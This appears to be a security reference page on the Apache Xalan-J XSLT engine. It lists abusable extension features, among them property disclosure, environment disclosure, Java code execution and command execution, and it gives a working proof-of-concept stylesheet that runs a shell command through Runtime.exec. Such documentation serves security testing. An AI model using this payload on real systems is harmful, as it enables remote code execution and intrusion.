Engine_XalanJ
Xalan-J is a Java based XSLT engine by the Apache Project.
Supported version
1.0
Command line
$> java org.apache.xalan.xslt.Process -in foo.xml -xsl foo.xsl
Note : xml-apis.jar, xercesImpl.jar and xalan*.jar must be in the $CLASSPATH
Identification strings
xsl:vendor-url | http://xml.apache.org/xalan-j |
---|---|
xsl:vendor | Apache Software Foundation |
xsl:version | 1.0 |
Special features
- Java properties disclosure
- Java environment disclosure
- Java code execution
- Arbitrary command execution
- File creation
- JDBC connectivity
Java properties disclosure
The xsl:system-property() standard function can be called with non standard arguments, mapped to Java properties. In this example, the name of the Java properties is stored in a separate XML file (
). The XSLT code will, for each property, display its name and its value.Namespace | Function | PoC | Sample output |
---|---|---|---|
http://www.w3.org/1999/XSL/Transform | system-property() |
Java environment disclosure
The checkEnvironment() extension function (documented here) will display some information about the execution context (packages, paths, versions, ...).
Namespace | Extension function | PoC | Sample output |
---|---|---|---|
http://xml.apache.org/xalan | checkEnvironment() |
Java code execution
The attached code will display the current date using a newly created "java.util.Date" object. This should be enough to demonstrate Java code execution.
Namespace | Extension function | PoC | Sample output |
---|---|---|---|
http://xml.apache.org/xalan/java/java.util.Date | new() | Current date: Wed Jan 11 22:45:07 CET 2012 |
Execution of external commands
The following code will execute the command "touch /tmp/hello" :
<?xml version="1.0"?>
<xsl:stylesheet xmlns:xsl="http://www.w3.org/1999/XSL/Transform"
xmlns:j="http://xml.apache.org/xalan/java"
exclude-result-prefixes="j"
version="1.0">
<xsl:template match="/">
<xsl:variable name="c"><![CDATA[touch = /tmp/hello]]></xsl:variable>
<xsl:variable name="a" select="j:split($c, ' = ')"/>
<xsl:variable name="r" select="j:java.lang.Runtime.getRuntime()"/>
<xsl:variable name="p" select="j:exec($r, $a )"/>
No content at the moment ...
</xsl:template>
</xsl:stylesheet>